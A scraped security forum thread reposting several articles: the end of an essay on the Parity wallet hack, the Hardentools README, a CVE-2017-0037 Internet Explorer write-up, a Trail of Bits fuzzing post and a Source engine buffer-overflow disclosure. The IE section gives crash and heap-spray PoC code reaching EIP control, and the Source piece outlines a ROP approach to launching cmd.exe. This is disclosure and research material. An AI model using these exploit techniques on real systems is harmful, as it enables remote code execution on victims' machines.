you build intelligent security mechanisms into your contracts, if there’s a bug or successful attack, there’s no way to shut off your servers and fix the mistake. Being on Ethereum by definition means everyone owns your server. A common saying in cybersecurity is “attack is always easier than defense.” Blockchain sharply multiplies this imbalance. It’s far easier to attack because you have access to the code of every contract, know how much money is in it, and can take as long as you want to try to attack it. And once your attack is successful, you can potentially steal all of the money in the contract. Imagine that you were deploying software for vending machines. But instead of a bug allowing you to simply steal candy from one machine, the bug allowed you to simultaneously steal candy from every machine in the world that employed this software. Yeah, that’s how blockchain works. In the case of a successful attack, defense is extremely difficult. The white-hats in the Parity hack demonstrated how limited their defense options were — there was no way to secure or dismantle the contracts, or even to hack back the stolen money; all they could do was hack the remaining vulnerable contracts before the attacker did. This might seem to spell a dark future. But I don’t think this is a death knell for blockchain programming. Rather, it confirms what everyone already knows: this ecosystem is young and immature. It’s going to take a lot of work to develop the training and discipline to treat smart contracts the way that banks treat their ATM software. But we’re going to have to get there for blockchain to be successful in the long run. This means not just programmers maturing and getting more training. It also means developing tools and languages that make all of this easier, and give us rigorous guarantees about our code. It’s still early. Ethereum is a work in progress, and it’s changing rapidly. You should not treat Ethereum as a bank or as a replacement for financial infrastructure. And certainly you should not store any money in a hot walletthat you’re not comfortable losing. But despite all that, I still think Ethereum is going to win in the long run. And here’s why: the developer community in Ethereum is what makes it so powerful. Ethereum will not live or die because of the money in it. It will live or die based on the developers who are fighting for it. The league of white-hats who came together and defended the vulnerable wallets didn’t do it for money. They did it because they believe in this ecosystem. They want Ethereum to thrive. They want to see their vision of the future come true. And after all the speculation and the profiteering, it’s ultimately these people who are going to usher the community into its future. They are fundamentally why Ethereum will win in the long run—or if they abandon Ethereum, their abandonment will be why it loses. This attack is important. It will shake people up. It will force the community to take a long, hard look at security best practices. It will force developers to treat smart contract programming with far more rigor than they currently do. But this attack hasn’t shaken the strength of the builders who are working on this stuff. So in that sense it’s a temporary setback. In the end, attacks like this are good for the community to grow up. They call you to your senses and force you to keep your eyes open. It hurts, and the press will likely make a mess of the story. But every wound makes the community stronger, and gets us closer to really deeply understanding the technology of blockchain — both its dangers, and its amazing potential. P.S. If you’re a dev and you want to learn more about smart contract security, this is a really good resource. Sursa: https://medium.freecodecamp.org/a-hacker-stole-31m-of-ether-how-it-happened-and-what-it-means-for-ethereum-9e5dc29e33ce
-
- 1
-
-
Hardentools Hardentools is a collection of simple utilities designed to disable a number of "features" exposed by operating systems (Microsoft Windows, for now), and primary consumer applications. These features, commonly thought for Enterprise customers, are generally useless to regular users and rather pose as dangers as they are very commonly abused by attackers to execute malicious code on a victim's computer. The intent of this tool is to simply reduce the attack surface by disabling the low-hanging fruit. Hardentools is intended for individuals at risk, who might want an extra level of security at the price of some usability. It is not intended for corporate environments. WARNING: This is just an experiment, it is not meant for public distribution yet. Also, this tool disables a number of features, including of Microsoft Office, Adobe Reader, and Windows, that might cause malfunctions to certain applications. Use this at your own risk. Bear in mind, after running Hardentools you won't be able, for example, to do complex calculations with Microsoft Office Excel or use the Command-line terminal, but those are pretty much the only considerable "downsides" of having a slightly safer Windows environment. Before deciding to use it, make sure you read this document thoroughly and understand that yes, something might break. In case you experience malfunctions as a result of the modifications implemented by this tool, please do let us know. When you're ready, you can find the latest download here. How to use it Once you double-click on the icon, depending on your Windows security settings, you should be prompted with an User Access Control dialog asking you confirmation to allow Hardentools to run. Click "Yes". Then, you will see the main Hardentools window. It's very simple, you just click on the "Harden" button, and the tool will make the changes to your Windows configuration to disable a set of features that are risky. Once completed, you will be asked to restart your computer for all the changes to have full effect. In case you wish to restore the original settings and revert the changes Hardentools made (for example, if you need to use cmd.exe), you can simply re-run the tool and instead of an "Harden" button you will be prompted with a "Restore" button. Similarly, click it and wait for the modifications to be reverted. In the future, we will create the ability to select or deselect certain modifications Hardentools is configured to make. Please note: the modifications made by Hardentools are exclusively contextual to the Windows user account used to run the tool from. In case you want Hardentools to change settings for other Windows users as well, you will have to run it from each one of them logged in. What this tool does NOT It does NOT prevent software from being exploited. It does NOT prevent the abuse of every available risky feature. It is NOT an Antivirus. It does not protect your computer. It doesn't identify, block, or remove any malware. It does NOT prevent the changes it implements from being reverted. If malicious code runs on the system and it is able to restore them, the premise of the tool is defeated, isn't it? Disabled Features Generic Windows Features Disable Windows Script Host. Windows Script Host allows the execution of VBScript and Javascript files on Windows operating systems. This is very commonly used by regular malware (such as ransomware) as well as targeted malware. Disabling AutoRun and AutoPlay. Disables AutoRun / AutoPlay for all devices. For example, this should prevent applicatons from automatically executing when you plug a USB stick into your computer. Disables powershell.exe, powershell_ise.exe and cmd.exe execution via Windows Explorer. You will not be able to use the terminal and it should prevent the use of PowerShell by malicious code trying to infect the system. Sets User Account Control (UAC) to always ask for permission (even on configuration changes only) and to use "secure desktop". Disable file extensions mainly used for malicious purposes. Disables the ".hta", ".js", ".JSE", ".WSH", ".WSF", ".scr", ".vbs" and ".pif" file extensions for the current user (and for system wide defaults, which is only relevant for newly created users). Microsoft Office Disable Macros. Macros are at times used by Microsoft Office users to script and automate certain activities, especially calculations with Microsoft Excel. However, macros are currently a security plague, and they are widely used as a vehicle for compromise. With Hardentools, macros are disabled and the "Enable this Content" notification is disabled too, to prevent users from being tricked. Disable OLE object execution. Microsoft Office applications are able to embed so called "OLE objects" and execute them, at times also automatically (for example through PowerPoint animations). Windows executables, such as spyware, can also be embedded and executed as an object. This is also a security disaster which we observed used time and time again, particularly in attacks against activists in repressed regions. Hardentools entirely disables this functionality. Disabling ActiveX. Disables ActiveX Controls for all Office applications. Acrobat Reader Disable JavaScript in PDF documents. Acrobat Reader allows to execute JavaScript code from within PDF documents. This is widely abused for exploitation and malicious activity. Disable execution of objects embedded in PDF documents. Acrobat Reader also allows to execute embedded objects by opening them. This would normally raise a security alert, but given that legitimate uses of this are rare and limited, Hardentools disables this. Authors This tools is developed by Claudio Guarnieri, Mariano Graziano and Florian Probst. Sursa: https://github.com/securitywithoutborders/hardentools
-
CVE to PoC - CVE-2017-0037 17 JULY 2017 CVE-2017-0037 Internet Explorer “Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.” The PoC The vulnerability was found by Ivan Fratric of Google Project Zero. The following is the PoC he provided: <!-- saved from url=(0014)about:internet --> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,100)"> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="5" width=0></th> <th class="class2" width=0><div class="class2"></div></th> With a few notes: The PoC crashes in MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement when reading from address 0000007800000070 [...] Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address. [...] Let's take a look at the code around the rip of the crash. 00007ffe`8f330a51 488bcd mov rcx,rbp 00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=???????????????? 00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c) 00007ffe`8f330a5f 488bcd mov rcx,rbp 00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax] 00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi] 00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h] 00007ffe`8f330a74 488bcf mov rcx,rdi 00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)] 00007ffe`8f330a7d 488bce mov rcx,rsi 00007ffe`8f330a80 ffd7 call rdi On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations). On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory. However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls. Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80. Sounds pretty easy to control that CMP condition if we can perform heap spray and point EAX to some memory location we control. Control EIP First of all let's confirm that the PoC works: (654.eec): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000038 ebx=049f4758 ecx=049f4758 edx=00000002 esi=00000064 edi=5a0097f0 eip=59a15caf esp=0399bd68 ebp=0399bd94 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:00000038=???????? I played a little bit with the width of that "th" element as suggested by Ivan and found that a value of "2000000" allows us to move the value of EAX to a controlled memory location in the heap spray: 0:018> bu 59a15caf 0:018> g [...] Breakpoint 0 hit eax=03bd86d4 ebx=03bd86c4 ecx=03bd86c4 edx=00000002 esi=00000064 edi=5a005320 eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:03bd86d4=a0949807 (skip the first break) 0:007> g Breakpoint 0 hit eax=0bebc2d8 ebx=04be9ae0 ecx=04be9ae0 edx=00000002 esi=00000064 edi=5a0097f0 eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:0bebc2d8=0e0e0e0e As expected, EAX points to some valid (and controllable) memory location. If the CMP condition is satisfied the vulnerable routine tries to load the vftable of the object located at "0e0e0e0e" and calls the function at +1A4h: 59a15caf 833800 cmp dword ptr [eax],0 59a15cb2 7448 je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xf1 (59a15cfc) 59a15cb4 8bcb mov ecx,ebx 59a15cb6 e8ec8181ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::SGridBoxItem> >::Readable (5922dea7) 59a15cbb 8965f0 mov dword ptr [ebp-10h],esp 59a15cbe 8b18 mov ebx,dword ptr [eax] 59a15cc0 8b03 mov eax,dword ptr [ebx] 59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] 59a15cc8 8bcf mov ecx,edi 59a15cca ff15ac1f455a call dword ptr [MSHTML!__guard_check_icall_fptr (5a451fac)] 59a15cd0 8bcb mov ecx,ebx 59a15cd2 ffd7 call edi Step by step: 59a15cbe 8b18 mov ebx,dword ptr [eax] ds:002b:0bebc2d8=0e0e0e0e 59a15cc0 8b03 mov eax,dword ptr [ebx] ds:002b:0e0e0e0e=0e0e0e0e 59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] ds:002b:0e0e0fb2=41414141 59a15cd2 ffd7 call edi {41414141} The following is a working PoC to set EIP to 41414141 <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,1000)"> <div id="hs"></div> <script> // Heap Spray - DEPS avoid null bytes var hso = document.getElementById("hs"); hso.style.cssText = "display:none"; var junk = unescape("%u0e0e%u0e0e"); while (junk.length < 0x1000) junk += junk; var rop = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc"); var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc"); var xchg = unescape("%u4141%u4141"); // initial EIP control var offset = 0x7c9; // to control eip var data = junk.substring(0,offset) + xchg + rop + shellcode; data += junk.substring(0,0x800-offset-xchg.length-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x350; i++) { var obj = document.createElement("button"); obj.title = data.substring(0,(0x7fb00-2)/2); // 2 null bytes terminator hso.appendChild(obj); } </script> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="0" width=2000000></th> <!-- width should control eax contents, should land somewhere in the heap spray --> <th class="class2" width=0><div class="class2"></div></th> Working Exploit It's pretty obvious, we have a memory leak and control of EIP. Chain together CVE-2017-0059 and CVE-2017-0037 and you'll have a working exploit for Windows 7 and IE11... or just wait tomorrow for the full release Claudio Moletta Sursa: https://redr2e.com/cve-to-poc-cve-2017-0037/
-
A fuzzer and a symbolic executor walk into a cloud POST AUGUST 2, 2016 29 COMMENTS Finding bugs in programs is hard. Automating the process is even harder. We tackled the harder problem and produced two production-quality bug-finding systems: GRR, a high-throughput fuzzer, and PySymEmu (PSE), a binary symbolic executor with support for concrete inputs. From afar, fuzzing is a dumb, brute-force method that works surprisingly well, and symbolic execution is a sophisticated approach, involving theorem provers that decide whether or not a program is “correct.” Through this lens, GRR is the brawn while PSE is the brains. There isn’t a dichotomy though — these tools are complementary, and we use PSE to seed GRR and vice versa. Let’s dive in and see the challenges we faced when designing and building GRR and PSE. GRR, the fastest fuzzer around GRR is a high speed, full-system emulator that we use to fuzz program binaries. A fuzzing “campaign” involves executing a program thousands or millions of times, each time with a different input. The hope is that spamming a program with an overwhelming number of inputs will result in triggering a bug that crashes the program. Note: GRR is pronounced with two fists held in the air During DARPA’s Cyber Grand Challenge, we went web-scale and performed tens of billions of input mutations and program executions — in only 24 hours! Below are the challenges we faced when making this fuzzer, and how we solved those problems. Throughput. Typically, program fuzzing is split into discrete steps. A sample input is given to an input “mutator” which produces input variants. In turn, each variant is separately tested against the program in the hopes that the program will crash or execute new code. GRR internalizes these steps, and while doing so, completely eliminates disk I/O and program analysis ramp-up times, which represent a significant portion of where time is spent during a fuzzing campaign with other common tools. Transparency. Transparency requires that the program being fuzzed cannot observe or interfere with GRR. GRR achieves transparency via perfect isolation. GRR can “host” multiple 32-bit x86 processes in memory within its 64-bit address space. The instructions of each hosted process are dynamically rewritten as they execute, guaranteeing safety while maintaining operational and behavioral transparency. Reproducibility. GRR emulates both the CPU architecture and the operating system, thereby eliminating sources of non-determinism. GRR records program executions, enabling any execution to be faithfully replayed. GRR’s strong determinism and isolation guarantees let us combine the strengths of GRR with the sophistication of PSE. GRR can snapshot a running program, enabling PSE to jump-start symbolic execution from deep within a given program execution. PySymEmu, the PhD of binary symbolic execution Symbolic execution as a subject is hard to penetrate. Symbolic executors “reason about” every path through a program, there’s a theorem prover in there somewhere, and something something… bugs fall out the other end. At a high level, PySymEmu (PSE) is a special kind of CPU emulator: it has a software implementation for almost every hardware instruction. When PSE symbolically executes a binary, what it really does is perform all the ins-and-outs that the hardware would do if the CPU itself was executing the code. PSE explores the relationship between the life and death of programs in an unorthodox scientific experiment CPU instructions operate on registers and memory. Registers are names for super-fast but small data storage units. Typically, registers hold four to eight bytes of data. Memory on the other hand can be huge; for a 32-bit program, up to 4 GiB of memory can be addressed. PSE’s instruction simulators operate on registers and memory too, but they can do more than just store “raw” bytes — they can store expressions. A program that consumes some input will generally do the same thing every time it executes. This happens because that “concrete” input will trigger the same conditions in the code, and cause the same loops to merry-go-round. PSE operates on symbolic input bytes: free variables that can initially take on any value. A fully symbolic input can be any input and therefore represents all inputs. As PSE emulates the CPU, if-then-else conditions impose constraints on the originally unconstrained input symbols. An if-then-else condition that asks “is input byte B less than 10” will constrain the symbol for B to be in the range [0, 10) along the true path, and to be in the range [10, 256) along the false path. If-then-elses are like forks in the road when executing a program. At each such fork, PSE will ask its theorem prover: “if I follow the path down one of the prongs of the fork, then are there still inputs that satisfy the additional constraints imposed by that path?” PSE will follow each yay path separately, and ignore the nays. So, what challenges did we face when creating and extending PSE? Comprehensiveness. Arbitrary program binaries can exercise any one of thousands of the instructions available to x86 CPUs. PSE implements simulation functions for hundreds of x86 instructions. PSE falls back onto a custom, single-instruction “micro-executor” in those cases where an instruction emulation is not or cannot be provided. In practice, this setup enables PSE to comprehensively emulate the entire CPU. Scale. Symbolic executors try to follow all feasible paths through a program by forking at every if-then-else condition, and constraining the symbols one way or another along each path. In practice, there are an exponential number of possible paths through a program. PSE handles the scalability problem by selecting the best path to execute for the given execution goal, and by distributing the program state space exploration process across multiple machines. Memory. Symbolic execution produces expressions representing simple operations like adding two symbolic numbers together, or constraining the possible values of a symbol down one path of an if-then-else code block. PSE gracefully handles the case where addresses pointing into memory are symbolic. Memory accessed via a symbolic address can potentially point anywhere — even point to “good” and “bad” (i.e. unmapped) memory. Extensibility. PSE is written using the Python programming language, which makes it easy to hack on. However, modifying a symbolic executor can be challenging — it can be hard to know where to make a change, and how to get the right visibility into the data that will make the change a success. PSE includes smart extension points that we’ve successfully used for supporting concolic execution and exploit generation. Measuring excellence So how do GRR and PSE compare to the best publicly available tools? GRR GRR is both a dynamic binary translator and fuzzer, and so it’s apt to compare it to AFLPIN, a hybrid of the AFL fuzzer and Intel’s PIN dynamic binary translator. During the Cyber Grand Challenge, DARPA helpfully provided a tutorial on how to use PIN with DECREE binaries. At the time, we benchmarked PIN and found that, before we even started optimizing GRR, it was already twice as fast as PIN! The more important comparison metric is in terms of bug-finding. AFL’s mutation engine is smart and effective, especially in terms of how it chooses the next input to mutate. GRR internalizes Radamsa, another too-smart mutation engine, as one of its many input mutators. Eventually we may also integrate AFL’s mutators. During the qualifying event, GRR went face-to-face with AFL, which was integrated into the Driller bug-finding system. Our combination of GRR+PSE found more bugs. Beyond this one data point, a head-to-head comparison would be challenging and time-consuming. PySymEmu PSE can be most readily compared with KLEE, a symbolic executor of LLVM bitcode, or the angr binary analysis platform. LLVM bitcode is a far cry from x86 instructions, so it’s an apples-to-oranges comparison. Luckily we have McSema, our open-source and actively maintained x86-to-LLVM bitcode translator. Our experiences with KLEE have been mostly negative; it’s hard to use, hard to hack on, and it only works well on bitcode produced by the Clang compiler. Angr uses a customized version of the Valgrind VEX intermediate representation. Using VEX enables angr to work on many different platforms and architectures. Many of the angr examples involve reverse engineering CTF challenges instead of exploitation challenges. These RE problems often require manual intervention or state knowledge to proceed. PSE is designed to try to crash the program at every possible emulated instruction. For example PSE will use its knowledge of symbolic memory to access any possible invalid array-like memory accesses instead of just trying to solve for reaching unconstrained paths. During the qualifying event, angr went face-to-face with GRR+PSE and we found more bugs. Since then, we have improved PSE to support user interaction, concrete and concolic execution, and taint tracking. I’ll be back! Automating the discovery of bugs in real programs is hard. We tackled this challenge by developing two production-quality bug-finding tools: GRR and PySymEmu. GRR and PySymEmu have been a topic of discussion in recent presentations about our CRS, and we suspect that these tools may be seen again in the near future. By Peter Goodman Sursa: https://blog.trailofbits.com/2016/08/02/engineering-solutions-to-hard-program-analysis-problems/
-
Remote Code Execution In Source Games Valve's Source SDK contained a buffer overflow vulnerability which allowed remote code execution on clients and servers. The vulnerability was exploited by fragging a player, which casued a specially crafted ragdoll model to be loaded. Multiple Source games were updated during the month of June 2017 to fix the vulnerability. Titles included CS:GO, TF2, Hl2:DM, Portal 2, and L4D2. We thank Valve for being very responsive and taking care of vulnerabilites swiftly. Valve patched and released updates for their more popular titles within a day. Missing Bounds Check The function nexttoken is used to tokenize a string. Note how the buffer str is copied into the buffer token, as long as a NULL character or the delimieter character sep is not found. No bounds checking is performed. View source on GitHub. const char *nexttoken(char *token, const char *str, char sep) { ... while ((*str != sep) && (*str != '\0')) { *token++ = *str++; } ... } The Vulnerability The method ParseKeyValue of class CRagdollCollisionRulesParse is called when processing ragdoll model data, such as when a player is fragged. This method calls nexttoken to tokenize the rule for further processing. By supplying a collisionpair rule longer then 256 characters, the buffer szToken can be overflowed. Since szToken is stored on the stack, the return address of the ParseKeyValue method can be overwritten. View source on GitHub. class CRagdollCollisionRulesParse : public IVPhysicsKeyHandler { virtual void ParseKeyValue( void *pData, const char *pKey, const char *pValue ) { ... else if ( !strcmpi( pKey, "collisionpair" ) ) ... char szToken[256]; const char *pStr = nexttoken(szToken, pValue, ','); ... } } Mitigation Bypass Address Space Layout Randomization (ASLR) is a powerful mitigation against exploiting memory corruption vulnerabilities. The mitigation randomizes the addresses where executables are loaded into memory. This feature is opt-in, and all executables loaded into memory of a process must have it enabled in order for it to be effective. The DLL steamclient.dll did not have ASLR enabled. This meant the address of executable pages of steamclient.dll loaded into memory at predictable addresses. This allowed existing instructions within the executable memory pages to be located and used trivially. Collecting ROP Gadgets Return Oriented Programming is a technique that allows shellcode to be created by re-using existing instructions in a program. Simply put, you find a chain of instructions that end with a RETN instruction. You insert the address of the first instruction of the chain to the stack, so when a function returns the address is popped into the Instruction Pointer register, and then the instructions execute. Since x86 and x64 instructions do not need to be memory aligned, any address can be interpreted as an instruction. By setting the instruction pointer to a middle of an instruction, a wider range of instructions become available. The Immunity Debugger plugin Mona provides a utility to discover gadgets. Be aware though, the plugin doesn't find all useful gadgets, such as REP MOVS. Launching cmd.exe Due to the way the payload is processed, NULL characters can not be used, and upper case characters are converted to lower case characters. This means our ROP gadget addresses becomes limited, as well as any other data used in our payload. To get around this, the shellcode is boostraped with with a gadget chain which locates the original un-modified buffer in memory. The un-modified payload is then copied back onto the stack via a REP MOVS gadget. The steamclient.dll executable imports LoadLibraryA and GetProcaddressA. This allows us to load other DLLs into memory, and obtain references to additional exported functions. We can import Shell32.dll to obtain a reference to the function ShellExecuteA, which can be used to launch other programs. Proof Of Concept In order to give third-party mod creators time to update their games, the proof of concept will be released in 30 days. Source mod developers should apply the patch below. Delivering The Payload The Source engine allows custom content to be packed into map files. Commonly this is used for adding extra content to maps, such as sounds or textures. By packing a ragdoll model file into a map file, with the same resource path as an original ragdoll model file, our version will be used instead. Recommended Fix To prevent buffer overflows from occurring, do not store more data in a buffer than it can hold. The nexttoken function should accept a token length argument which would be used to perform bounds checking. Developers who have created a Source modification game should apply the following patch. To mitigate exploitation of memory corruption vulnerabilities, enable ASLR for all executables. Perform automated checks during the build process to ensure all executables support ASLR. This can be achieved by using the checkbins.py utility developed by the chromium team. Additionally, Source games should be sandboxed to restrict access to resources and to prevent new processes from being started. As an example of how effective proper sandboxing can be, kernel exploits are often used when exploiting web browser memory corruption vulnerabilities, since the userland browser process is so restricted. For additional information, refer to Chromium's sandbox implementation. Download Patch Final Thoughts Video games are interesting targets for exploitation, not only technically but also logistically. As video games are common inside employee break rooms and homes of employees, exploitation of a vulnerability could be used in a targeted attack to jump the air gap to a private network. Additionally, discovering a remote code execution vulnerability in a popular video game can be used to quickly create a bot net or spread ransomware. As a mitigation, games should not be installed on work devices. Gaming machines should be moved to an untrusted network, and business devicess should not connect to the untrusted network. For those who play Soruce games, the attack surface can be shrunk by disabling third-party content from downloading. This can be achieved with the console commands cl_allowdownload 0 and cl_downloadfilter all. Additionally, since the vulnerability was discovered in the Source SDK, additional third-party mods are most likely vulnerable. However, by enabling ASLR for all executable modules, a memory disclosure vulnerability is required to develop a reliable exploit. About the author: Justin Taft is a software engineer who is adamant about secure coding practices. He has worked with many Fortune 500 companies to improve their security posture of their products. From reversing firmware of biometric fingerprint readers, to performing security reviews of cloud based Java application deployments, he is experienced in tackling a wide range of security assessments. Sursa: https://oneupsecurity.com/research/remote-code-execution-in-source-games?t=r
-
- 2
-